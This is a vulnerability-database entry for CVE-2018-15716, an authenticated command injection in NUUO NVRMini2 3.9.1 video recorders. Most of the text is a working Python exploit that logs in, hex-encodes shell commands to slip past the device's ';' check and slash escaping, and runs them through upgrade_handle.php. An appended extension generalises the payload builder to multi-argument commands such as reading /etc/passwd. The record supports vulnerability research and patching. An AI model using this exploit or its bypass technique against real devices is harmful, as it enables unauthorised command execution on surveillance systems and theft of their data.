ID
VAR-E-201812-0167
CVE
cve_id: | CVE-2018-15716 | Trust: 1.5 |
cve_id: | CVE-2018-14933 | Trust: 0.5 |
EDB ID
45948
TITLE
NUUO NVRMini2 3.9.1 - (Authenticated) Command Injection - PHP webapps Exploit
Trust: 0.6
DESCRIPTION
NUUO NVRMini2 3.9.1 - (Authenticated) Command Injection. CVE-2018-15716 . webapps exploit for PHP platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | nuuo | model: | nvrmini2 | scope: | eq | version: | 3.9.1 | Trust: 2.7 |
vendor: | nuuo | model: | nvrmini upgrade handle.php remote | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
# Exploit Title: NUUO NVRMini2 Authenticated Command Injection
# Date: December 3, 2018
# Exploit Author: Artem Metla
# Vendor Homepage: https://www.nuuo.com/ProductNode.php?node=2#
# Version: 3.9.1
# Tested on: NUUO NVRMini2 with firmware 3.9.1
# CVE : CVE-2018-15716
# Advisory: https://www.tenable.com/security/research/tra-2018-41

import argparse
import requests
import urllib.parse
import binascii
import http.cookiejar as cookielib
import re


def run(target, username, password, command):
    """ Authenticate us and execute exploitation """
    # Step 1. Authentication
    payload = {'language': 'en', 'user': username, 'pass': password,
               'submit': 'Login'}
    r = requests.post(urllib.parse.urljoin(target, 'login.php'),
                      data=payload, verify=False, allow_redirects=False)
    jar = r.cookies

    # Step 2. Prepare a payload
    # We're bypassing 2 filters:
    # 1) Instead of using ";" we can try || or &&, to bypass:
    #        if(strpos($uploaddir, ';') !== false)
    #        {
    #            die('[1]Not a valid path.');
    #        }
    # 2) To bypass this:
    #        $cmd = "sed -i 's/".str_replace('/', '\/', $current_dir)."/".str_replace('/', '\/', $tmp_upload_dir)."/g' ".PHP_CINF_PATH;
    #    we have to HEX encode a payload (every "/" in the argument would
    #    otherwise be rewritten to "\/" before reaching the shell)
    #
    # Simple example of payload that we're trying to achieve:
    #     '||ls`echo -e "\\x20\\x2f"`||'
    # to execute: ls /
    # 3) Multiple parameters commands are not supported yet, but the same
    #    technique could be used for them

    # Primitive Bash command parser: split off everything after the first
    # space unless the next token is an option (starts with "-")
    splitted_command = [command]
    for i in range(0, len(command) - 1):
        if command[i] == " " and command[i + 1] != "-":
            splitted_command = [command[:i], command[i + 1:]]
            break

    # Encoding a payload: the argument part becomes "\\xNN" escapes; the
    # shell collapses "\\" to "\" inside double quotes and echo -e does the rest
    if len(splitted_command) == 2:
        payload = "".join('\\\\x%s' %
                          binascii.hexlify(char.encode('ascii')).decode("utf-8")
                          for char in splitted_command[1])
        exploit = '\'||%s `echo -e "%s"`||\'' % (splitted_command[0], payload)
        print("Exploit: %s" % exploit)
    else:
        exploit = '\'||%s||\'' % (splitted_command[0])
        print("Exploit: %s" % exploit)

    # Step 3. Send a payload
    payload = {'cmd': 'writeuploaddir', 'uploaddir': exploit}
    r = requests.get(urllib.parse.urljoin(target, 'upgrade_handle.php'),
                     params=payload, verify=False, cookies=jar)

    # Step 4. Output processing to grab only needed output
    # str() on the raw bytes keeps newlines as a literal backslash-n,
    # hence the replace below
    res = re.search('upload_tmp_dir=([^<>]*)<br />', str(r.content))
    if res:
        print(res.group(1).replace('\\n', '\n'))


def main():
    """ Parse command line arguments and start exploit """
    parser = argparse.ArgumentParser(
        add_help=False,
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="Examples: %(prog)s -t http://192.168.0.1/ -u username -p password -c whoami")

    # Adds arguments to help menu
    parser.add_argument("-h", action="help",
                        help="Print this help message then exit")
    parser.add_argument("-t", dest="target", required=True,
                        help="Target URL address like: https://localhost:443/")
    parser.add_argument("-u", dest="username", required=True,
                        help="Username to authenticate")
    parser.add_argument("-p", dest="password", required=True,
                        help="Password to authenticate")
    parser.add_argument("-c", dest="command", required=True,
                        help="Shell command to execute")

    # Assigns the arguments to various variables
    args = parser.parse_args()
    run(args.target, args.username, args.password, args.command)


#
# Main
#
if __name__ == "__main__":
    main()
Trust: 1.0
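Added example, not part of the exploit-db entry or of Artem Metla's code: the exploit comment above notes that commands with several parameters are not supported yet but that the same hex-encoding technique would cover them. The block below generalises the payload builder to encode the whole argument list, and emulates offline the two layers the exploit comments describe: the PHP strpos(';') check together with the str_replace('/', '\/') rewrite, and the shell's double-quote backslash collapse followed by echo -e expansion. The function names (build_payload, passes_php_filter, recovered_command) are this example's own, and the server-side emulation is a simplified model based only on the PHP fragments quoted in the exploit; it does not model anything else upgrade_handle.php might do.

```python
"""Generalised '||cmd `echo -e "..."`||' payload builder plus an offline
emulation of the filters the exploit comments quote (added example)."""
import re

# Program names stay unencoded, so they must survive both the ';' check
# and the '/' -> '\/' rewrite untouched: keep them to a safe character set.
SAFE_PROG = re.compile(r"[A-Za-z0-9_.-]+")


def hex_escape(text: str) -> str:
    """Encode every byte as a shell-level '\\\\xNN' escape.

    Two backslashes are emitted per byte: inside shell double quotes
    '\\\\' collapses to '\\', so echo -e finally sees '\\xNN'.
    """
    return "".join("\\\\x%02x" % b for b in text.encode("utf-8"))


def build_payload(command: str) -> str:
    """Build the uploaddir value for an arbitrary command line.

    Unlike the one-argument parser in the exploit, everything after the
    program name is hex-encoded as a single string, so several parameters
    (and any character, including '/', ';', quotes) work.
    """
    prog, _, args = command.strip().partition(" ")
    if not SAFE_PROG.fullmatch(prog):
        raise ValueError("program name must not contain '/', ';' or spaces: %r" % prog)
    if args:
        return "'||%s `echo -e \"%s\"`||'" % (prog, hex_escape(args))
    return "'||%s||'" % prog


def passes_php_filter(uploaddir: str) -> bool:
    """Emulate the only server-side check quoted in the exploit:
    if(strpos($uploaddir, ';') !== false) die(...)."""
    return ";" not in uploaddir


def php_sed_escape(uploaddir: str) -> str:
    """Emulate str_replace('/', '\\/', $tmp_upload_dir) before the sed call."""
    return uploaddir.replace("/", "\\/")


def recovered_command(uploaddir: str) -> str:
    """Return the command the shell ends up running (simplified emulation).

    The leading quote closes sed's single-quoted s/// argument, '||' starts
    a new command, and the trailing '||'' re-opens the quote. Inside the
    double-quoted echo argument '\\\\' collapses to '\\' and echo -e turns
    each '\\xNN' back into a byte.
    """
    escaped = php_sed_escape(uploaddir)
    m = re.fullmatch(r"'\|\|(.*)\|\|'", escaped, re.S)
    if not m:
        raise ValueError("payload does not break out of sed's quotes")

    def expand(sub: "re.Match") -> str:
        inner = sub.group(1).replace("\\\\", "\\")  # double-quote collapse
        out = bytearray()
        for tok in re.finditer(r"\\x([0-9a-fA-F]{2})|(.)", inner, re.S):
            if tok.group(1):
                out.append(int(tok.group(1), 16))  # echo -e expansion
            else:
                out.extend(tok.group(2).encode("utf-8"))
        return out.decode("utf-8")

    return re.sub(r'`echo -e "([^"]*)"`', expand, m.group(1))


if __name__ == "__main__":
    for cmd in ("ls /", "cat /etc/passwd /etc/group", "id -u"):
        p = build_payload(cmd)
        print("%-30s -> %s" % (cmd, p))
        print("   passes ';' filter: %s, shell runs: %s"
              % (passes_php_filter(p), recovered_command(p)))
```

The round trip is what makes the technique checkable before touching a device: a payload that still contains ';' or '/' after building would either be rejected by the strpos() check or mangled by the slash escaping, and recovered_command() shows exactly which command line the shell would receive.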
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
(Authenticated) Command Injection
Trust: 1.0
TAGS
tag: | exploit | Trust: 1.0 |
tag: | Command Injection | Trust: 1.0 |
tag: | web | Trust: 0.5 |
tag: | php | Trust: 0.5 |
CREDITS
Artem Metla
Trust: 0.6
EXTERNAL IDS
db: | TENABLE | id: | TRA-2018-41 | Trust: 3.2 |
db: | EXPLOIT-DB | id: | 45948 | Trust: 1.6 |
db: | NVD | id: | CVE-2018-15716 | Trust: 1.5 |
db: | 0DAYTODAY | id: | 31736 | Trust: 0.6 |
db: | EDBNET | id: | 100475 | Trust: 0.6 |
db: | EDBNET | id: | 100428 | Trust: 0.6 |
db: | PACKETSTORM | id: | 150624 | Trust: 0.5 |
db: | NVD | id: | CVE-2018-14933 | Trust: 0.5 |
db: | PACKETSTORM | id: | 151573 | Trust: 0.5 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2018-15716 | Trust: 1.5 |
url: | https://0day.today/exploits/31736 | Trust: 0.6 |
url: | https://www.exploit-db.com/exploits/45948/ | Trust: 0.6 |
url: | https://nvd.nist.gov/vuln/detail/cve-2018-14933 | Trust: 0.5 |
SOURCES
db: | PACKETSTORM | id: | 150624 |
db: | PACKETSTORM | id: | 151573 |
db: | EXPLOIT-DB | id: | 45948 |
db: | EDBNET | id: | 100475 |
db: | EDBNET | id: | 100428 |
LAST UPDATE DATE
2022-07-27T09:24:09.047000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 150624 | date: | 2018-12-05T09:02:22 |
db: | PACKETSTORM | id: | 151573 | date: | 2019-02-07T16:40:36 |
db: | EXPLOIT-DB | id: | 45948 | date: | 2018-12-04T00:00:00 |
db: | EDBNET | id: | 100475 | date: | 2018-12-12T00:00:00 |
db: | EDBNET | id: | 100428 | date: | 2018-12-08T00:00:00 |